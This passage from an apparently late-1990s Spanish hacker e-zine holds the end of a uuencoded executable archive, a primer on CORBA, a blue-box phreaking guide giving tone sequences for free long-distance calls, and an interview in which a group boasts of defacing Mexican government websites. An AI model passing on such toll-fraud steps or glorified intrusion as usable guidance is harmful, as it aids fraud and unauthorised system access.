MY=L.OP99^D[/OD=>N4`EYGL/_X;<I5\!*^1D4;&.'41DV&632KD0M@_1'=Q"
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
MQV;KW?.90$^AE:7%%>2A4H^B]5K(=\HE.[!3L$#ELW6&70VDLZ4=.AÐ50
MK:D*W5Q*HELB^R2<V$N/\NC![PU9,C_O.4;P$^1@YH0Y02/VC&>6/M1AYLL/
M1#/]8I3_);E_YT3.FU.>^>@B?Q2<<7A#.3<C+B6]T][1+6(>U#C:9J[28R#Z
M8MY)N_^=NA7V!1WQ!.;V\RQE.GNJ7B1C`87->9++M^KE#;\SCP*;F1E1I0B*
M6S5!_$!_SI]+#K=<WL6/YY1N]X\R;,>!*B@S?^'JE'3/,ZU]#9*8,/C40^()
M'6#D@$0'9U:B34S@F[PWGM&,SVT#(-C>!9BQHT?IJ<_8IWF"Y@N=GDX\=D69
MH#\H%:VLEC8\\LK-RF%^1;1K"VOJOO'LL@,CX\$.'_.)"1A.8/^9EU)V[RWB
MEW;LG->BF`+%7'-*!M[L6NFZD[W'CB=2*O_BVBA[J&\JIN=K<:_)]CC>3="!
MMGTXQ0CY1`MY;,;R-'E"D.<':@HAE`!EJK4*#Y6WZ(3J$ZXY)30D5#+<'SNO
MS0Z$JG_F5Q2M(9.%Q8'/R*@R,N8?KIOBWY8\D.H`T9E37RFOW^C`[I)7]X-]
MZ&#L?#`H`.PS!/PIIZVF].`1YGUH*0T4+[*&>7B?^;?^0'6L?%;KR'+*X]AR
M6[J^87]G[+79N;UZPF?:P/S5[H9`*K?@OHY0K9:634NZW`BENSR6_T5ELS5\
MMX1&9HH8XS!]S\!^,[W_A/<Q[2PG%^-=.C>;]V$V:IA-M)#=:<]X8A4V53K"
MD<+'_%^ZXD.S#ZX[F."ZT.:.IQ\X%]$6T9["CNFA=[/T5J+Z-Y19^W!T1C`:
M8J]^$UL8/$=;_6\D)U[CU_6<'8RVD[GZ*H?%B?9*I`$;;QO$I$+]DJ&`_KHH
M.Q08/<;+V8T.AAEI1GZ?>2)O!GLG6B#^#6WP+LBQ>G:+V?'Y8%W\]V).K0M1
M[*"?\F,=6@$6)F_G'\N\?(V1R@FO3SQ,3A.EQX2Z$ZIMJC!VQC"\O0'W-"J7
M)&JMF5YU\NG!=:[K!.CBG69C=&1.M^!@]3IR?0%LX-9'I24ES2_("HZ)C*@4
M.F&*'$^\7HI\//TTINDM1GH:\;LVNVFC0IB;)]/4-F4H3)@+FJ%E2?UN(WOG
M-%C&?EWK['%=6;%2`QJO/&N^?FO*^-ES@5=GDNO>8FGGY;6*XT[<:V#4]>C9
M^1?."#U*<S+8J>"19.J==3+763_BZOOW;(I]$0]_92^CO48%CTR;OYG*SK5`
M0`J+GU!(/3R0:8^65F+LMZZ?0^M$MX+[Q"@%CSCG&!TT#NE8;?,Y]GY^]1`*
M%!<O+I;26&Q!HUD"AG$4\>)_G.2A&P]\_?<R`H=$^](D.XUK9'WPY_N'G=P=
MCY:Y7_]:F.'=F?P8?3\]Q7/"!3#OL3<;/!@^T.+`3(DJ)=U"4/K0@B$#,3P\
MRBV6^WUF[J[1`C64X^UPH1)ZC#4(:D2UN4T92`/S5ZB%`)2XT]"(.<[F=P2%
M#48[S*@7IKZ[/.10T`]ZR/#6T,QYG3^--?R!\[\&]6V.J!/$C=3(YT%'F*L7
M])[UNV2@GGAMU9Z=QNFAV+`=U9/\&&;HQV+PHTL`F*'#90+?O<Z`_<H8U]RG
M:O5EPCR2!/1<WQ!GHTA%_]3U;R<$1W*#@'X6K?"H>F!#'_[,8WK<YP^!Q^J5
M>.!B,.&\5G&.=.XP)!1`:TJ*UI59UMCT%:N%<NO:_,+BP,+92)5BM3&?*E4H
MX*'-Y^OFR)YDIKTNQC-FQX.WQZV"IDI2YL6[FI#J1YC&QT&LF"4<12!<S02/
MI+,S'4\]&`<=2;L>"\VP11=],Q7\U"9L^;"#G\CC9XVL)-P<G:H;-Y6^6&MM
M(=?!,X.VF?Z'_;EU&5!#3<!@T!,_X$=*:%]/;?.G[4^:=O=MG-5XR>*9WGR+
M?:J6$+E>.V@>$%ZC6P`[&*ME0B_#P9&-??W9*8G?6?9!)Z>CQX[&QF:$Z)Z+
MLHS@&/L=A39\QS^)!H9>=FPL#L?)QKY5K!8!)1J/'Y.2!'$`-,1",WW(4,@%
MJV?#G)!IZ[ZO7#MB:<*Q!GP^0O]LX\5$W'.9,[P-GRM808>3IZX.;5:L#R<O
MG89U8CNUV-GK2U,X>U,B=HP('F&O@AR+:_VG2F!6^'5&]T#@X_T%"P)S.F.B
M][B]%E_=VW8SGG)4L9\ZI'DN#A.O_L?"UWW+57\M*M?4%CC'.@/CBW5K^AF3
M^Z9';2GN*5I*:;NC<HM3)6\Q.AL%Y,+:KSO#Y2WV_P502P$"%``4``(`"`!1
M32T=\W]J_M,2``",&```#``N```````$`""44RH`````0D%40TA#3TTN15A%
M!P`J`&(9\-+)^*811XN?C+`NT]FB/;<HKC8U6EO6),$C^D'?S5MNT+=>)IJD
MV5!+`0(4`!0``@`(``!(3R!;UN"$LQ0``+L5```,``````````0`(.-I[?T2
D``!"051#2$5812Y%6$502P4&``````(``@"B````VB<`````
`
end

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[ FIN DEL PROGRAMA ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


<=Yo-Soy=>
varf@bigfoot.com
<ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ CORBA - 12r ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

---------------------------------------------------------------------
----------------------------CORBA------------------------------------
---------------------by 12r43l Overdrive-----------------------------
---------------------12r@antisocial.com------------------------------
---------------------------------------------------------------------

Ya que CORBA es una buena alternativa para el desarrollo de aplicaciones
distribuidas y absoluta contraparte de el modelo de M$ COM/DCOM , en este
articulo se explica basicamente que es CORBA.

Olvidandonos momentaneamente de la historia y en terminos cortos, CORBA es un
estandar de computacion distribuida en el cual un objeto es una unica
instancia identificable de algun tipo de construccion que provee servicios que
pueden ser requeridos por un cliente.

Un tipo se refiere a enteros, caracteres, etc..., una constuccion de tipos son
estructuras, uniones, etc...

Una interfaz es un conjunto de servicios que puden ser requeridos o atendidos
por uno o mas objetos, ademas una interfaz puede tener atributos.

Los servidores llamados implementaciones de objetos proveen la execucion de
los servicios requeridos.

Arquitectura.

basicamente la arquitectura de CORBA se puede expresar en terminos de tres
componentes primarios que son:
El cliente, el Object Request Broker (ORB), y la implementacion del objeto.

El cliente solicita servicios del ORB, el ORB localiza la implementacion
de los objetos que se requieren para satisfacer una peticion en particular,
invoca un metodo de la implementacion y regresa el resultado recibido de la
implementacion al cliente.
La implementacion expone metodos para ser invocados por el ORB, ejecuta
cualquier operacion requerida para satisfacer el requerimiento y regresa el
resultado al ORB.

El cliente solo conoce como accesar al ORB y pedirle un servicio, no sabe ni
conoce como trabaja la implementacion. Cuando un ORB recibe un pedido, el
corazon del ORB es responsable de encontrar la implementacion de objeto,
invocando algun metodo, pasando parametros, y transfiriendo control a la
implementacion.

Un adaptador de objeto provee la interfaz entre el ORB y la implementacion del
objeto, el ORB soporta uno o mas adaptadores de

  
objetos.


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Blue Boxing en Argentina - Dr_Format^ ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
_
_ //_____
\// |
____ / |_____ _______ ______ _ ________ ____
/ |___| |/ |/ /___ \|_____ \ / /
/ |\ \ | | / \ \ \ / //HCK \
/__________\ |_____\_____|____\_____\_____| /_____/\_____\ _
- --------| _|__ - ---------------------------------------\\ - -
/_____|_| \|
| _|_
|_ PhreAK nota por Dr_Format^ especialmente para Raregazz
|___ HACK THE PLANET

BoXIng ArGeNtinA!



El BLUE BOX UNA FORMA DE PHREAKING

Que pasa cuando nosotros llamamos a un telefono?

Cuando nosotros realizamos un llamado al mismo switch (ej: 21-2323 21 es el
switch) el llamado no sale de la central; si el numero que discamos no
pertenece a nuestro switch, nuestra central le envia una serie de tomos o
comandos al otro switch. Cuando cortamos nuestro switch le indica al otro que
debe volver a modo normal.

Que pasaria si falsificaramos el corte?
Podriamos hacer llamados INTERNACIONALES y NACIONALES completamente gratis,
ahora les paso a explicar como es el asunto!


- - = Blue Boxing desde ZERO = - -
Para centrales CCITT #5

Los comandos mas importantes son:

KP = Key Pulse (NACIONAL)
KP2 = Key Pulse 2 (INTERNACIONAL)
ST = Start Tone (comienza un secuencia)
2600/2400hz = frecuencia de corte (la mas importante)


Como realizamos llamados completamente gratis?

country
Llamada internacional 00 code area switch date
| | | | |
KP 080030303 WAIT 2600 STP2 (XX)-(XX)-(XX)-(XXX)-(XXX) ST
|
cualquier
0800

switch
Llamada nacional area code | date
| | |
KP 080030303 WAIT 2600 STP (XX)-XXX-XXX
|
cualquier
0800

Aca tienen una lista de los tonos de las centrales digitales, espero que les
sirva:

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Tono ³ Frecuencia ³ Tiempo de ³ Tiempo de ³
³ ³ (Hz) ³ Activado ³ Desactivado ³
³ ³ ³ (Seg.) ³ (Seg.) ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³Discado ³ 350+440 ³ Continuo ³ ³
³Ocupado ³ 480+620 ³ 0,5 ³ 0,5 ³
³Campanilla normal ³ 440+480 ³ 2 ³ 4 ³
³Campanilla PBX ³ 440+480 ³ 1 ³ 3 ³
³Congestion (tel.pub.)³ 480+620 ³ 0,2 ³ 0,3 ³
³Rellamada (Local) ³ 480+620 ³ 0,3 ³ 0,2 ³
³Receptor Descolgado ³ 1400+2060+³ 0,1 ³ 0,1 ³
³ ³ 2450+2600 ³ ³
³Numero no existe ³ 200 a 400 ³ Continuo, modulado en ³
³ ³ ³ frecuencia con 1 Hz. ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Bueno amigos espero que esta nota les haya gustado!.. y bueno les deseo mucha
suerte!

Saludos de Dr_Format^
fbossi@usa.net


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Entrevista a X-Ploit Team ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

En exclusiva para todos los lectores RareGaZz les ofrecemos esta entrevista
que hemos realizado al tan famoso grupo mexicano X-Ploit:


-------------------------------------------------------------------
- Como surgio x-ploit TEAM?

En alguna vez nos encontramos en el IRC en un canal de hacking, comenzamos a
intercambiar informacion y comenzamos a frecuentarnos, posteriormente
comenzamos algunos proyectos juntos y surgio la idea de formar un grupo,
afectados por la misma problematica; siendo todos mexicanos, y cansados de los
abusos del gobierno decidimos intervenir los sistemas del gobierno mexicano.

-------------------------------------------------------------------
- Cuantos miembros lo componen?

Somos 3, LoTek, LeadRain y DES, todos mexicanos. Nos conocemos personalmente,
aunque nuestro primer contacto fue electronico. Pero la red nos permite estar
a mucha distancia y seguir actuando como una fuerza efectiva.

-------------------------------------------------------------------
- Desde cuando estan activos?

Desde hace aproximadamente 1 a¤o.

-------------------------------------------------------------------
- Que les llevo a unirse? algun objetivo en concreto?

Nuestras ideas eran similares, y nuestro intercambio de informacion fue muy
dinamico, y productivo, todos los miembros del equipo aportabamos activamente,
por lo que nos acoplamos perfectamente para nuestros proyectos.

-------------------------------------------------------------------
- Poseen alguna pagina web? donde?

No, no existe pagina oficial de X-ploit, aunque nos gustaria encontrar espacio
en algun sitio para subir la informacion del grupo.

-------------------------------------------------------------------
- En que proyectos estan trabajando actualmente?

Seguridad en todos sabores de UN*X, phreaking, NO virus, NO anarquia.

-------------------------------------------------------------------
- Quien es el lider de X-Ploit TEAM?

No hay un lider, todos aportamos para el equipo cuanto podemos, con ideas
tanto de unos como de otros.

-------------------------------------------------------------------
- He oido mucho hablar de x-ploit pero nunca de ninguno de sus miembros. Les
gusta permanecer en el anonimato? no tienen nicks?

Claro que si tenemos, somos Lotek, LeadRain y DES, sino has escuchado de
nuestros nicks es precisamente porque somos un equipo, y nos hemos dado
a conocer como el X-Ploit Team.

-------------------------------------------------------------------
- Estan llevando a cabo alguna labor educativa, como crear listas de correo,
revistas, etc?

No, por el momento puede ser riesgoso para nosotros tener mucha participacion
en ese aspecto, aunque si deseariamos dar a conocer a otros hackers
herramientas para crear un frente comun.

-------------------------------------------------------------------
- Creen que su proximidad con Estados Unidos les ha influido? Como?

Si y no, no se pueden negar los origenes del hacking en Estados Unidos, asi
como en otros paises (Alemania, etc), sin embargo hemos formado un perfil
muy nacional, con otras ideas, problematica que nos afecta a nosotros, y que
es ajena a la de los hackers de otros paises, NO hemos querido hacer NON-SENSE
HACKING, sino hackear con una finalidad, una idea central, no solo por poner
"AQUI ESTUVE". Por lo mismo nuestros hacks han sido enfocados al BIG BROTHER,
e instituciones corruptas.

-------------------------------------------------------------------
- Son especialmente conocidos por sus ataques al gobierno mexicano. Como se
les ocurrio y cuando empezaron estos ataques?

Comenzaron el 4 de Febrero, con el hack a la pagina de la secretaria de
Hacienda, y posteriormente:

23.Abril.98 Comision Nacional del Agua (www.cna.gob.mx)
29.Abril.98 Instituto Nacional de Estadistica Geografia e Informatica
(www.inegi.gob.mx)
25.Mayo.98 Senado de la Republica (www.senado.gob.mx)
14.Julio.98 Secretaria de Salud (www.ssa.gob.mx)
16.Septiembre.98 San Pedro.gob.mx (www.sanpedro.gob.mx)

-------------------------------------------------------------------
- Como lograron introducirse en su red?

Diferentes vulnerabilidades, propias de cada sistema, desde DYNIX, Solaris,
SCO, etc...

-------------------------------------------------------------------
- Hackean tambien otro tipo de webs? cuales?

Si, pero no alteramos informacion en ellos, incluso en la mayoria de las
ocasiones hemos reportado los huecos de seguridad al administrador del sistema,
en otros aplicamos el parche correspondiente y no decimos nada.

-------------------------------------------------------------------
- Creen que con el hacking se puede da¤ar a un gobierno? Creen haberlo
conseguido?

Quizas no, pero lo que si hemos conseguido es despertar a otros hackers a
actuar en contra del gobierno corrupto, si cada vez somos mas en algun momento
seremos mas fuertes y entonces tendran miedo de que rebelemos la verdad a todo
el mundo.

-------------------------------------------------------------------
- A esto, algunos lo llaman *hactivismo* (hackear por motivos politicos y
sociales). Piensan que forma parte de la evolucion natural del hacker?

Si, es hacer hacking con una finalidad, como te repito, ya no es solamente
poner "AQUI ESTUVE", sino aprovechar el impacto que puede tener el hecho de
entrar a un sistema que deberia ser muy seguro, es una noticia que da la
vuelta al mundo, y que mejor que hacerlo para manifestar la inconformidad del
PUEBLO.

-------------------------------------------------------------------
- Tienen contactos frecuentes con la guerrilla zapatista? La ayudan de alguna
forma? Se puede decir que guerrilleros y hackers van por el mismo camino, en
Mexico?

No podriamos llamarnos guerrilleros, ni llamar a los hackers en general asi,
pues cada hacker o grupo tiene su ideologia, algunos solo hacen por demostrar
que pueden hacerlo o que un sistema es vulnerable, pero lo que es un hecho es
que ambos, hackers y guerrilleros estamos contra el gobierno, y asi lo
estaremos mientras nos quieran enga¤ar y controlar, lo que si podria decir es
que ambos somo REBELDES.

-------------------------------------------------------------------
- El mundo exterior no cree que con el hacking se pueda cambiar la sociedad,
pero ustedes, con sus acciones, han conseguido como minimo que sus denuncias
saltasen las fronteras mexicanas. Era este el objetivo? Piensan que se puede
llegar mas alla de la simple contrapropaganda? Aprobarian llegar mas alla?

Claro, como ya lo hemos manifestado nuestra protesta fue de un enorme impacto,
llego a escucharse en los rincones del mundo, gracias a INTERNET, no es algo
extra¤o lo que estamos haciendo, INTERNET es un medio masivo de comunicacion,
y como tal lo estamos aprovechando, para dar a conocer problemas de nuestro
pais, que el gobierno ha querido encubrir, para guardar una imagen ante el
mundo, nosotros les demostramos que aunque "solo" eramos unos hackers contra
todo su sistema represivo pudimos manifestarnos y decir la verdad, todo esto
gracias a LA RED.

-------------------------------------------------------------------
- Como ven el futuro del mundo undergroung en Mexico y el undreground hispano
en general?

Esta madurando, en algunos paises ha crecido como una replica de lo que sucede
en Estados Unidos, a diferencia y muy concretamente en Mexico nosotros hemos
querido empezar una escena de hackers CONSCIENTES, con ideologia muy concreta,
no queremos que se confunda PIRATA con HACKER, el "hacktivism" como se ha dado
en llamar a nuestras acciones, asi como las de otros grupos en el mundo ha
sido un paso importante en la evolucion del hacking, creemos que en el futuro
los hackers vamos a poder rechazar y realmente seleccionar la informacion que
sea verdadera, rechazar las mentiras y del mismo modo dar a conocer la verdad,
la censura cada vez sera menor, en el verdadero sentido de la palabra somos
PODEROSOS los hackers, y somos una comunidad, es dificil que los gobiernos
puedan reprimirnos a todos. Es muy bueno que surgan revistas en nuestro idioma,
como RareGaZz, que demuestran que hay una escena de hackers latinos alla
afuera...

-------------------------------------------------------------------
- Tienen algun sitio de reunion (IRC, BBS, etc ...)?

No, seria muy peligroso para el equipo presentarnos en sitios "publicos". De
hecho nos han comentado por e-mail que nos han visto en el IRC, evidentemente
no somos nosotros, no entrariamos al IRC a decir quienes somos y a alardear,
corriendo el riesgo de ser rastreados.

